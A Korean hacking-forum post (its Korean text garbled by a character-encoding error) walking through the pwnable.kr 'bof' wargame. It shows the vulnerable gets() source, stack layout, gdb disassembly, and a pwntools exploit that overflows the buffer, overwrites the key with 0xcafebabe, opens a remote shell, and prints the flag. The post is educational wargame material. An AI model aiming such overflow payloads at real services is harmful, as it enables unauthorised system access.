http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=8591 [º¹»ç]
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ checksec --file=bof
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH 70 Symbols No 0 1 bof
checksecÀ¸·Î È®ÀÎÇϸé Canary found°¡ ¶¹´Ù.
´ëÃæ Ä«³ª¸®°¡ µÇ¾î ÀÖ´Ù°í »ý°¢Çߴµ¥ ¼Ò½º¸¦ ÀÚ¼¼È÷ ºÃ´Ù.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
¿©±â¼ ÇÞ°¥·È´ø °Ç ¸Å°³º¯¼ö int key°¡ ¸®ÅϾîµå·¹½ºº¸´Ù ¾Õ¿¡ ÀÖ´ÂÁö
µÚ¿¡ ÀÖ´ÂÁö Á¤È®ÇÑ °³³äÀÌ »ó±âµÇÁö ¾Ê¾Ò´Ù.
(ÀÌ·¸°Ô ±â¾ï ¾È ³¯ ¶§¸¶´Ù ÀÚÁÖ ¹Ýº¹ÇÏ°í ÇнÀÇÏ¸é¼ °øºÎ°¡ µÇ´Â °Í °°´Ù)
ÀϹÝÀûÀÎ x86-64 ȯ°æ¿¡¼, key¿Í overflowme´Â ½ºÅÿ¡ ´ÙÀ½°ú °°Àº ¼ø¼·Î ¹èÄ¡µÈ´Ù.
RET
SFP
key
overflowme (Áö¿ª º¯¼ö)
µû¶ó¼, key´Â Ç×»ó ¸®ÅÏ ÁÖ¼Ò ¹× SFPº¸´Ù µÚÂÊ¿¡ À§Ä¡ÇÑ´Ù.
ÀÌ°É È®ÀÎÇϱâ À§ÇØ C·Î °£´ÜÇÑ ÇÁ·Î±×·¥À» ÄÄÆÄÀÏÇؼ ½ÇÇàÇß´Ù.
===============================================
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ cat test.c
#include <stdio.h>
void func(int key)
{
char overflowme[32];
printf("Address of overflowme: %p\n", (void*)overflowme);
printf("Address of key: %p\n", (void*)&key);
}
void main()
{
func("0xdeadbeef");
}
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ ./test
Address of overflowme: 0x7ffe2575c7c0
Address of key: 0x7ffe2575c7bc
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$
===================================================
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ pwnable$ gdb -q bof
Reading symbols from bof...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x0000068a <+0>: push ebp
0x0000068b <+1>: mov ebp,esp
0x0000068d <+3>: and esp,0xfffffff0
0x00000690 <+6>: sub esp,0x10
0x00000693 <+9>: mov DWORD PTR [esp],0xdeadbeef
0x0000069a <+16>: call 0x62c < func>
0x0000069f <+21>: mov eax,0x0
0x000006a4 <+26>: leave
0x000006a5 <+27>: ret
End of assembler dump.
(gdb) disas func
Dump of assembler code for function func:
0x0000062c <+0>: push ebp
0x0000062d <+1>: mov ebp,esp
0x0000062f <+3>: sub esp,0x48
0x00000632 <+6>: mov eax,gs:0x14
0x00000638 <+12>: mov DWORD PTR [ebp-0xc],eax
0x0000063b <+15>: xor eax,eax
0x0000063d <+17>: mov DWORD PTR [esp],0x78c
0x00000644 <+24>: call 0x645 < func+25>
0x00000649 <+29>: lea eax,[ebp-0x2c]
0x0000064c <+32>: mov DWORD PTR [esp],eax
0x0000064f <+35>: call 0x650 < func+36>
0x00000654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>: jne 0x66b < func+63>
0x0000065d <+49>: mov DWORD PTR [esp],0x79b
0x00000664 <+56>: call 0x665 < func+57>
0x00000669 <+61>: jmp 0x677 < func+75>
0x0000066b <+63>: mov DWORD PTR [esp],0x7a3
0x00000672 <+70>: call 0x673 < func+71>
0x00000677 <+75>: mov eax,DWORD PTR [ebp-0xc]
0x0000067a <+78>: xor eax,DWORD PTR gs:0x14
0x00000681 <+85>: je 0x688 < func+92>
0x00000683 <+87>: call 0x684 < func+88>
0x00000688 <+92>: leave
0x00000689 <+93>: ret
End of assembler dump.
¾Æ·¡´Â bof¸¦ °ø·«ÇÒ ¼ö ÀÖ´Â exploitÄÚµåÀÌ´Ù.
from pwn import *
context.log_level = 'debug'
p = remote('pwnable.kr', 9000)
#p = process('./bof')
payload = b'A' * 0x34
payload += p32(0xcafebabe)
p.sendline(payload)
p.interactive()
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ python3 exploit.py
[+] Opening connection to pwnable.kr on port 9000: Done
[DEBUG] Sent 0x39 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 ¦¢AAAA¦¢AAAA¦¢AAAA¦¢AAAA¦¢
*
00000030 41 41 41 41 be ba fe ca 0a ¦¢AAAA¦¢¡¤¡¤¡¤¡¤¦¢¡¤¦¢
00000039
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x1c bytes:
b'bof\n'
b'bof.c\n'
b'flag\n'
b'log\n'
b'super.pl\n'
bof
bof.c
flag
log
super.pl
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x20 bytes:
b'daddy, I just pwned a buFFer :)\n'
daddy, I just pwned a buFFer :)
$
flag°ªÀº
daddy, I just pwned a buFFer :) |
Hit : 193 Date : 2024/12/25 09:44
|